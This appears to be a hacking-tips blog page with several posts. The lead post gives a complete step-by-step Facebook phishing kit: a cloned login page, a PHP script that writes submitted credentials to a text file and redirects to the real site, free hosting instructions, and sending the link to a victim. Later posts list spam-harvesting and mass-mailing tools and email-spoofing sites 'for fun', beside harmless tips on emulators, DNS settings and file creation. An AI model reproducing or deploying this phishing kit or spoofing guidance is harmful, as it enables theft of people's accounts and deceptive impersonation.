Menu

Hack A Facebook Account By Phishing

Phishing is the act of fooling a computer user into submitting personal information by creating a counterfeit website that looks like a real (and trusted) site. It is a hacker technique of "fishing" for passwords and other secret financial info.
                        
So now i am starting to show you how to hack someone by phishing...
1). Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.

2). Now find (Press ctrl +f)  for "action="  in that code.
You have to change two things in that code..first of all you have to change method from POST to Get and secondly you have to change ACTION from https://login.facebook.com/login.php" to "next.php"
Save the document as index.html and change the file type as All Files.

3). Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:

        <?php
        header("Location: http://www.Facebook.com/login.php ");
        $handle = fopen("pswrds.txt", "a");
        foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
        }
        fwrite($handle, "\r\n");
        fclose($handle);
        exit;
        ?>

    save this file as "next.php"

4). Open the notepad and Now create a blank file and named it as  "pswrds.txt". Now onwards You have three files..first is "index.html".Second is "next.php" and third is "pswrds.txt"
Now we have to upload this three files on a php web hosting service.
I am using 000webhost.com. Its an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms.

5). Go to on http://www.000webhost.com/ and click on sign up. and select any domain name.

6). After doing above steps you have to verify your mail account that you used at the time of signup process. Verify your mail account.

7). Click on the site link which is shown under DOMAIN section to go to your control panel.

8). Now when you are logged into your account click on the Go to cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

9). After logging to Your File manager Section. Now Click on the Public_html directory.

10). Before proceeding to next delete default.php under public_html directory.Now click on the Upload button, choose the three file that we created earlier.(index.html,next.php and pswrds.txt).

11). Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwrds.txt" file.

12). Now Everything is set. The Only thing that we have to do is that pass the link to victim. After that if he/she login through that link then we are able to get his/her account and password.
Read more ...

Spamming

Spam can be defined as Electronic junk mail or junk newsgroup postings. Some people define spam even more generally as any unsolicited e-mail. Real spam is generally e-mail advertising for some product sent to a mailing list.In addition to wasting people's time with unwanted e-mail, spam also eats up a lot of network bandwidth. Consequently, there are many organizations, as well as individuals, who have taken it upon themselves to fight spam with a variety of techniques. But because the Internet is public, there is really little that can be done to prevent spam, just as it is impossible to prevent junk mail. However, some online services have instituted policies to prevent spammers from spamming their subscribers.

Now how a spammer can able to get Your email id. This can be done by following ways...

1)Social networking sites.
Many people on social networking sites leave thier privacy settings to very low.Its very easy to get E-mail id or other contact information on this kind of sites. Many spammers try to concentrate on this kind of sites for generating a spam list.

2)Online Applications 
Facebook also have a large number of application support but have you ever noticed that when we add any application to our profile it asks for permission to add our personal data to their database. These application adds data like email id,contact number of user to their database and this data list can be used by a spammer for spamming purpose.

3)Web-mail Extractors e.t.c
 Web-mail miner is free application to extract Email addresses from websites ,search engines,newsgroups.the working of this software is very easy. It searches for a user defined string pattern on a domain name.i.e emailaddress@domainname.com

There are lots of tools available in market for spamming purpose.
some of them are 123 hidden sender, direct sender, mail bomber, send blaster, e.t.c.
Read more ...

Footprinting

Footprinting is the first and most convenient way that hackers use to gather information about computer systems and the companies they belong to. The purpose of footprinting is to learn a much you can about a system, its remote access capabilities, its ports and services,and the aspects of its security.
In order to perform a successful hack on a system,it is best to know as much as you can.

There are Mainly Two Types of Footprinting

1) DNS Footprinting
In this a hacker tries to gather information on Domain name registration on various things like,Registration details,Server Type,Ip address, Location, Contact numbers e.t.c.
There are various tools that can be used in DNS Footprinting like whois and samspade are popular tools in this category But i will recommend whois.

Let see how we can Footprint a Website by its domain.
STEP 1: GO TO http://www.domaintools.com/
STEP 2: Type website URL which you want to footprint. (i.e  www.google.com , google.com or ip address of website) and click on Search for domain.
STEP 3: Footprinting process is now over. All information related to that domain name is in front of you. Information from its owner to its server type e.t.c. The all you have to do is to take a close look on whois record,site profile,registration,server stats Tabs. This information is very important from a hacker point of view.

2) Network Footprinting

This is a type of footprinting in which a hacker tries to gather information about Network Topology,hosts,operating system e.t.c
There are various tools which are used for Network Footprinting. But nmap is best among them all.
Read more ...

Email Spoofing

E-mail spoofing is the forgery of an e-mail header so that the message appears to have originated from someone or somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients to open, and possibly even respond to, their solicitations.

Senders insert commands in headers that will alter message information. It is possible to send a message that appears to be from anyone, anywhere, saying whatever the sender wants it to say. Thus, someone could send spoofed e-mail that appears to be from you with a message that you didn't write.

Above all is just a Small explanation on what is E-mail spoofing. these are the websites which are used to send fake emails

www.hoaxmail.co.uk
anonymailer.net
emkei.cz

above all emkei.cz  is my favourite because it provide some advance option like email-header, reply to,cc etc.

You can also send from your cmd, but for that purpose you need S.M.T.P server name of your I.S.P. so use above services only for fun.
Read more ...

How To Run Android Apps On Windows

Now you can run all of the famous Android Apps on your Windows PC. This is the easiest Tutorial to all those who wants to test the apps without wasting their time.

To run Android applications on windows xp,vista or windows 7,all you need is a small android emulator which you have to install on your pc.
                      http://techwarlock.blogspot.in/
There are lots of android emulator exists in market but we are using one of the well known "Blue stack BETA". the earlier version is "Blue Stack Alpha" which is  only compatible with  Windows 7 PC’s and Windows 8. Best part of new beta edition is basically converting the ARM compatible Android apps to run on x86 platform and that too with a great efficiency. Or simply it means Now the software is compatible with Vista and windows7 and Windows XP also. In new Blue stack BETA Users can download applications from GetJar, 1Mobile, and Amazon and test them on windows machine. So apps will be downloaded by the software and install with in it.

After downloading install this on your windows machine and then signup by using your facebook or bluestack account. After login download android applications and run them on your windows machine..:)
Read more ...

Increase Internet Speed Of your Netsetter

Idea,Airtel,Reliance,Tata Photon,Huawei And MTS Mblaze Netsetters are the most famous high-speed wireless internet service provider. All of them promise a High speed internet connection but we all know the real truth
                            http://techwarlock.blogspot.com/
Here today i will tried to bring out some of the tricks by which you can able to increase your net setter speed

So lets start.

1). Updating DNS Address:

Go to your Net setter connection Setting And Update your DNS address as following.
Some of the DNS servers you can use are
Google DNS : 8.8.8.8
Alternate Google DNS: 8.8.4.4.

2). Optimize TCP/IP Settings:

The TCP Optimizer is a free, easy Windows program that provides an visual interface for tuning and optimizing your Internet connection.

You Can Download TCP Optimizer from here http://www.speedguide.net/files/TCPOptimizer.exe

                      http://techwarlock.blogspot.com/
Once you launch the program you will see a slider with range of number on it. Slide the slider to match your connection speed. If you are on Tata Photon or Reliance net connect you can try a range between 2Mbps to 3Mbps.other users can try the speed that is officially provided by your net setter.

In the Bottom most Choose settings section check ‘Optimal’ settings if you are not sure about all the settings.Now click on apply changes and exit the program.

Now Connect to internet with your net setter and see a difference in speed.
Read more ...

Trick To Create A Empty Huge File

"Is it possible that a empty file can be huge as 1 million bytes.."?
Yes, off course its possible.You can create a file of any desired size by using the utilities provided by Windows.
                                   
So here's the step by step guide to create a Empty Huge File.
  1. First we have to convert the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. To use Windows calculator in scientific mode: Open calculator,click on view and select Scientific instead of Simple.
  2. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.)
  3. Pad the result with zeroes at the left until the file size reaches eight digits—000F4240.
  4. Open Command prompt by typing "cmd" in Run.
  5. Type Command "Debug BIGFILE.DAT" without Quotes.And Ignore the File not found message.
  6. Type RCX and press Enter. Now Debug utility will display a colon prompt.
  7. Enter the last four digits of the hexadecimal number you calculated,For i.e: If your calculated Hex Code is 000F4240 Then you have to enter 4240.
  8. Type RBX and press Enter,Then Enter the First four digits of the hexadecimal number you calculated, For i.e: If your calculated Hex Code is 000F4240 Then you have to enter 000F.
  9. Enter W for Write and Q for Quit.
You have just created a Empty file of 1 million bytes..You can create empty files of any size by following these easy steps.
Read more ...